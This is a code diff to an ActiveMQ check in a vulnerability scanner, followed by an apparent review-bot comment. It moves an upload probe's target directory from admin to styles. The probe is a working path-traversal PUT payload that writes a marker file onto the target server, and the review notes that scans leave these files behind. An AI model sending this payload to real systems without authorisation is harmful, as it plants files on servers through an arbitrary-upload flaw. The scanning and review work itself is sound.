diff --git a/vulscan/vuldb/activemq_upload.py b/vulscan/vuldb/activemq_upload.py
index 2013ed85..d95c032b 100644
--- a/vulscan/vuldb/activemq_upload.py
+++ b/vulscan/vuldb/activemq_upload.py
@@ -29,12 +29,12 @@ def check(ip, port, timeout):
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((ip, port))
 filename = random_str(6)
- flag = "PUT /fileserver/sex../../..\\admin/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n"%(filename)
+ flag = "PUT /fileserver/sex../../..\\styles/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n"%(filename)
 s.send(flag)
 time.sleep(1)
 s.recv(1024)
 s.close()
- url = 'http://' + ip + ":" + str(port) + '/admin/%s.txt'%(filename)
+ url = 'http://' + ip + ":" + str(port) + '/styles/%s.txt'%(filename)
 res_html = urllib2.urlopen(url, timeout=timeout).read(1024)
 if 'xxscan0' in res_html:
 return u"存在任意文件上传漏洞," + url
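Review bot: The probe on the new `flag` line writes a marker file into the target's web-served `styles` directory and nothing in the hunk removes it, so each scan of an affected host leaves a `.txt` file that can be fetched without credentials (the verification GET on the `url` line relies on exactly that). I would document this above the `flag` assignment, e.g. `# NOTE: leaves <filename>.txt under /styles/ on the target; the returned URL identifies it for cleanup`, and add a short comment on why `styles` replaced `admin` (presumably because `/admin/` cannot be read back without authentication, though the commit does not say). Separately, `s.close()` is skipped if `s.send` or `s.recv` raises, and the response from `s.recv(1024)` is discarded rather than checked. The body of `check` starts and ends outside the hunk, so whether an outer handler or timeout setting covers these cases is not visible here.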